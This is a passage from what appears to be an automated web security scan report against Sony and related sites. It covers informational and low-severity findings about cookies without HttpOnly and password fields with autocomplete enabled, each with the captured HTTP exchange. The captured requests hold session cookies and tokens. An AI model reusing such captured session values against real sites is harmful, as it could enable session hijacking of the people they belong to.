Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82290

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...

6.19. http://www.omnitechsupport.com/sony/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /sony/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sony/index.php?queue=ComputerPFS&OWChat=1&VARSET_MODELNUM=VGNNR180E HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.docs.sony.com/startchat.asp?modelnum=VGNNR180E&chat=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:59:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Set-Cookie: model=VGNNR180E; expires=Sat, 23-Jul-2011 14:59:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

6.20. http://www.sony.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sony.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache
Last-Modified: Thu, 23 Jun 2011 11:47:08 GMT
ETag: "16c6fb-1d30-a50c6700"
Accept-Ranges: bytes
Content-Length: 7472
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_xxx.tpo`.dpn-mc-80=449b23153660;Version=1;path=/

<html>
<head>
<title>Sony USA</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="pragma" content="no-cache" />
<meta name="google-site-verification" conte
...[SNIP]...

6.21. http://www.sony.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sony.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: www.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:49 GMT
Server: Apache
Location: http://www.sony.com/index.html
Content-Length: 276
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.tpo`.dpn-mc-80=449b23153660;Version=1;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sony.com/index.html">here</a>.</p>
<
...[SNIP]...

6.22. http://www.sony.com/storagemedia

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sony.com
Path:   /storagemedia

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /storagemedia HTTP/1.1
Host: www.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 23 Jun 2011 15:19:49 GMT
Server: Apache
Location: http://pro.sony.com/bbsc/ssr/cat-datastorage/cat-storagemedia/
Content-Length: 332
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.tpo`.dpn-mc-80=449b232f3660;Version=1;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://pro.sony.com/bbs
...[SNIP]...

6.23. http://www.sonystyle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844043|PC#1308841090453-474854.17#1310051783|check#true#1308842243; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedM%3Asidenav%3AesupportM%3Asidenav%3Aesupportundefined; s_channel=%5B%5B%27Other%27%2C%271308842183820%27%5D%5D; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":2,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; 
TS5bbf46=f5a8dd8fbe1377be8633e5a97c94fd613db8de389f7769144e0359c4

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 23 Jun 2011 15:20:36 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=20e81bc3747692973bc65cdb0fe7a96ffeed7bcabbab0ab54e0359c4; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.sonystyle.com/webapp/wcs/stores/serv
...[SNIP]...

6.24. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/OrderItemDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 92869
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=xRu1VrtkgP52lzARnuVxGqRnJ6o%3d%0a%3b2011%2d06%2d23+11%3a19%3a58%2e856%5f1308841107995%2d82466%5f10151%5f241903395%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:58 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903395=241903395%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG71reM2szqU9sVaoSplcv4qC13K3MxVyVffFlubAypUsqxwsrdjgGwciI7t%2bmUJpOpQ%0awCZ7N%2bxU8GRW1M9qkUX1QRYnKOeclHhUzZiuZ4Ag7kJUtfEcbEI83mX7QHMCV3dEPblR56Avsg%3d%3d; Path=/
Set-Cookie: TS5bbf46=629bbaf3a13ad4191c8387200e85cb355e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e31c595fb302859d4; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 92869


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- hostname: saiadsapp22 -->
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="t
...[SNIP]...

6.25. http://www.sonystyle.com/webapp/wcs/stores/servlet/ReturnProductInfo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ReturnProductInfo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/ReturnProductInfo?URL=SYReturnProductInfoResponseView&storeId=10151&syncPrice=true&getProdInfo=true HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":2,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; TS5bbf46=a2f5f4c32c2bdfdeb5abca8520ca28c3722f09a76db9ae634e0359c4; mbox=session#1308841090453-474854#1308844298|PC#1308841090453-474854.17#1310052038|check#true#1308842498; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedburpburp; s_channel=%5B%5B%27Other%27%2C%271308842437917%27%5D%5D; s_sq=%5B%5BB%5D%5D; fsr.a=1308842438745

Response

HTTP/1.1 200 OK
ntCoent-Length: 215
Content-Type: text/xml
Content-Language: en-US
Content-Length: 215
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:20:39 GMT
Connection: close
Set-Cookie: TS5bbf46=bf993e9f934dbd72f3971d5cefc73a642c2d2c068de0310e4e0359c7; Path=/
Cache-Control: private
Pragma: no-cache

<?xml version="1.0" encoding="UTF-8"?>
<ajax-response>
<response type="object" id="ReturnProductInfoObject">
<productInformation id="products">
{
"products":
{
}    
}
</productInformation>
</response>
<
...[SNIP]...

6.26. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYRedirectURLControllerCmd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SYRedirectURLControllerCmd?source=/4a76d HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844043|PC#1308841090453-474854.17#1310051783|check#true#1308842243; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedM%3Asidenav%3AesupportM%3Asidenav%3Aesupportundefined; s_channel=%5B%5B%27Other%27%2C%271308842183820%27%5D%5D; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":2,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; 
TS5bbf46=95277153801327c970f2ee5e018528035e46b2c7608495f34e0359a9db2332020de46713222f7b4ed69e61a0

Response

HTTP/1.1 302 Moved Temporarily
Referer: http://burp/show/6
Location: http://www.sonystyle.com
Content-Length: 0
Content-Type: text/html
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 15:20:36 GMT
Connection: close
Set-Cookie: TS5bbf46=bbd31f42cd1bb660e737709398a01a9a78da968d1dfc8e8b4e0359c4; Path=/
Cache-Control: private


6.27. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/SYWishListDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 73255
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=NcxPoQ35T9OIG2xvyDBqCI7m%2f6I%3d%0a%3b2011%2d06%2d23+11%3a19%3a56%2e636%5f1308841107995%2d82466%5f10151%5f241903389%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:56 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903389=241903389%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c7myjYVzeSmGi%2bSmSHBDsv5QE%2fLHtPO66u%2fvUa%2fYlSe5zgSuFTJCb5MP4YHwzkoVFU539TML12c%2fn%0aUvMgKy33JgbQLeMW1w%2b5FRcSl5w0xRgy7RkTPOUihpdheDWGKGdU5kOAsbyKsSyrEcwSZhZUfA%3d%3d; Path=/
Set-Cookie: TS5bbf46=4315494d6d4225f09c2745a0fa6895375e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e471aa5e16f42170c; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 73255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.e
...[SNIP]...

6.28. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/SYWishListDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 73360
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=gKhUalwoDI2z%2bNprXZ4zIKFzImo%3d%0a%3b2011%2d06%2d23+11%3a19%3a57%2e352%5f1308841107995%2d82466%5f10151%5f241903390%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:57 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903390=241903390%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG4oMGqREaYXQdgrhlLJv3qbvnxtslAf5G4pPtDsUOINJCueV5cMMwxhx5ni8RjGeSOa%0asInl12kMoEjmCmyUzHwfxteaIruGewQaiLBIDV0gTI%2bF6NR9bXRaayEonpmxIhImeBdp%2fZ1DQQ%3d%3d; Path=/
Set-Cookie: TS5bbf46=8cda39d87185f14d1bf971f120ead6895e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e6ced6c50a378910e; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 73360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.e
...[SNIP]...

6.29. http://www.us.playstation.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.us.playstation.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 23 Jun 2011 15:20:29 GMT
Server: Apache
Location: http://us.playstation.com/
Content-Length: 306
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: SONYCOOKIE1=2892277952.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://us.playstation.c
...[SNIP]...

6.30. http://www.us.playstation.com/Support

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.us.playstation.com
Path:   /Support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Support HTTP/1.1
Host: www.us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 23 Jun 2011 15:20:29 GMT
Server: Apache
Location: http://us.playstation.com/Support
Content-Length: 313
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: SONYCOOKIE1=2892277952.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://us.playstation.c
...[SNIP]...

7. Password field with autocomplete enabled
There are 3 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://twitter.com/sonyoutletusa

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /sonyoutletusa

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /sonyoutletusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308842373-2439-32037
ETag: "face9414ffcb37b56c235fd4a36ddf88"
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 23 Jun 2011 15:19:33 GMT
X-Runtime: 0.00853
Content-Type: text/html; charset=utf-8
Content-Length: 19872
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 2a867da6018348b9ab53639033d7a20fdada72a0
Set-Cookie: k=173.193.214.243.1308842373290278; path=/; expires=Thu, 30-Jun-11 15:19:33 GMT; domain=.twitter.com
Set-Cookie: guest_id=130884237329990406; path=/; expires=Sat, 23 Jul 2011 15:19:33 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLWwFb0wAToHaWQiJTJhY2JhYzVmNTU0YjJj%250AYmZhNWMyNDRmNDVkODk5OGIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8c7fe27671279233551b5c47933be7b27d397a15; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="e17c4f5eb6decd15e67b3e1ee968da07aa78012a" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

7.2. http://www.facebook.com/sonyelectronics

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sonyelectronics

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /sonyelectronics HTTP/1.1
